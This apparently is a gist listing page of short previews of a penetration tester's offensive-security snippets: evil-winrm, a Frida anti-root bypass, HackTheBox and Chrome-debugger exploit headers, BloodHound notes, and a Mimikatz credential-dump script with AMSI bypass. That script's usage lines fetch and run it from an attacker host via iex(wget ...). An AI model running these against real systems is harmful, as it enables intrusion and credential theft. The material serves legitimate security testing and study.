This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# @author Pichaya Morimoto (p.morimoto@sth.sh) | |
# gem install evil-winrm | |
# evil-winrm -u "${user}" -p "${pass}" -i "${ip}" | |
Evil-WinRM shell v3.4 | |
Info: Establishing connection to remote endpoint | |
Error: An error of type OpenSSL::Digest::DigestError happened, message is Digest initialization failed: initialization error |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// $ frida -l antiroot.js -U -f com.example.app --no-pause | |
// CHANGELOG by Pichaya Morimoto (p.morimoto@sth.sh): | |
// - I added extra whitelisted items to deal with the latest versions | |
// of RootBeer/Cordova iRoot as of August 6, 2019 | |
// - The original one just fucked up (kill itself) if Magisk is installed lol | |
// Credit & Originally written by: https://codeshare.frida.re/@dzonerzy/fridantiroot/ | |
// If this isn't working in the future, check console logs, rootbeer src, or libtool-checker.so | |
Java.perform(function() { | |
var RootPackages = ["com.noshufou.android.su", "com.noshufou.android.su.elite", "eu.chainfire.supersu", |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# @author Pichaya Morimoto (p.morimoto@sth.sh) | |
# Exploit for HackTheBox Clicker Machine (https://app.hackthebox.com/machines/564) | |
import requests | |
import random | |
import string | |
import urllib.parse | |
from base64 import b64encode,b64decode | |
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) | |
proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# @author Pichaya Morimoto (p.morimoto@sth.sh) | |
Problem: | |
```bash | |
brew install proxychains-ng | |
proxychains4 ncat 1.2.3.4 # not working | |
``` | |
There are public workarounds like https://benobi.one/posts/running_brew_on_m1_for_x86/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# @author Pichaya Morimoto (p.morimoto@sth.sh) | |
# Compiled list of my common bloodhound-python problems & solutions | |
Bloodhound-python Error #0 | |
You do not get info like GPO and permission abuse edges. | |
You need to add option -> -c All,LoggedOn | |
Bloodhound-python Error #1 | |
raise NoNameservers(request=self.request, errors=self.errors) | |
dns.resolver.NoNameservers: All nameservers failed to answer the query _ldap._tcp.pdc._msdcs.DCHOSTNAME. IN SRV: Server 10.3.3.7 TCP port 53 answered SERVFAIL |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@author LongCat (Pichaya Morimoto) | |
By default, only admin users have right to manage SCM | |
but if you (mistakenly) grant a non-admin user to manage SCM, | |
he will be able to perform tasks on behalf admin / nt authority system rights. | |
This fact is a known system design mentioned in .. | |
1. Service Security and Access Rights | |
https://docs.microsoft.com/en-us/windows/desktop/Services/service-security-and-access-rights |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# TLDR: | |
# iex(wget https://gist.github.com/pich4ya/e93abe76d97bd1cf67bfba8dce9c0093/raw/e32760420ae642123599b6c9c2fddde2ecaf7a2b/Invoke-OneShot-Mimikatz.ps1 -UseBasicParsing) | |
# | |
# @author Pichaya Morimoto (p.morimoto@sth.sh) | |
# One Shot for M1m1katz PowerShell Dump All Creds with AMSI Bypass 2022 Edition | |
# (Tested and worked on Windows 10 x64 patched 2022-03-26) | |
# | |
# Usage: | |
# 1. You need a local admin user's powershell with Medium Mandatory Level (whoami /all) | |
# 2. iex(wget https://attacker-local-ip/Invoke-OneShot-Mimikatz.ps1 -UseBasicParsing) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# A numeric lock has a 3 digit key | |
# "682" - One number is correct and well placed | |
# "614" - One number is correct but wrongly placed | |
# "206" - Two number are correct but wrongly placed | |
# "738" - Nothing is correct | |
# "780" - One number is correct but wrongly placed | |
from z3 import * | |
# Create three integer variables for the lock digits |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# @author Pichaya Morimoto (p.morimoto@sth.sh) | |
# Ported from https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/chrome_debugger.rb | |
# pip install requests websocket-client python-socks | |
# This exploit code can be used to read arbitrary files on the victim machine with | |
# chrome/chromium --remote-debugging-port=9222, usually runs as a test automation tool in any software testing phase | |
import requests | |
import json | |
import urllib3 | |
import websocket |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# @author Pichaya Morimoto (p.morimoto@sth.sh) | |
# How to capture Xamarin and Flutter HTTPS API traffic using iPhone and MBP | |
# วิธี mitm ดัก Web API ของ iOS App ผ่าน MacOS -> Burp Suite ที่เป็น unaware proxy | |
# (เช่น Xamarin, Flutter ที่ไม่วิ่งผ่าน System Proxy ไม่ใช้ default Cert Store ใน iPhone) | |
# ถ้าเป็นแอปปกติ ที่ใช้ system proxy อยู่แล้วไม่ต้องทำท่านี้ก็ได้ ตั้ง proxy ปกติไปได้เลย | |
1. เสียบ iPhone (ที่ jailbreak แล้ว) กับ MBP ผ่าน USB แล้วใช้ iproxy ตั้งให้ local port 8080 บน iPhone วิ่งเข้า local port 8080 บน MBP ด้วย ssh reverse tunnel (-R) | |
$ brew install usbmuxd | |
$ iproxy 2222 22 & disown && ssh -R 8080:localhost:8080 -p 2222 root@127.0.0.1 -N -f |
NewerOlder